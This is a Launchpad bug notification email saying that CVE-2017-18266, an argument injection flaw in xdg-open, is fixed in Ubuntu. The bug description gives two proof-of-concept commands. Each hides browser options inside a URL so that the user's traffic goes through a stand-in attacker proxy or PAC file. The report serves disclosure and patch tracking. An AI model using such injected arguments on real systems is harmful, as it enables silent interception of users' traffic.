This was addressed in https://usn.ubuntu.com/usn/usn-3650-1 and in xdg-
utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!
** Changed in: xdg-utils (Ubuntu)
Status: New => Fix Released
--
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to xdg-utils in Ubuntu.
https://bugs.launchpad.net/bugs/1772295
Title:
CVE-2017-18266: argument injection in xdg-open
Status in Xdg-utils:
Fix Released
Status in xdg-utils package in Ubuntu:
Fix Released
Bug description:
An attacker can silently set their proxy in browser settings to
capture user's traffic, using a malformed URL in xdg-open.
The following command tries to open Yandex main page though third-
party proxy server.
env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-
proxy evil-site.example.org:8080'
Another sample of an exploit with Chromium browser.
env -i BROWSER="chromium %s" xdg-open "http://www.example.com/
--proxy-pac-url=http://dangerous.example.net/proxy.pac";
To manage notifications about this bug go to:
https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions
--
Mailing list: https://launchpad.net/~desktop-packages
Post to : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help : https://help.launchpad.net/ListHelp
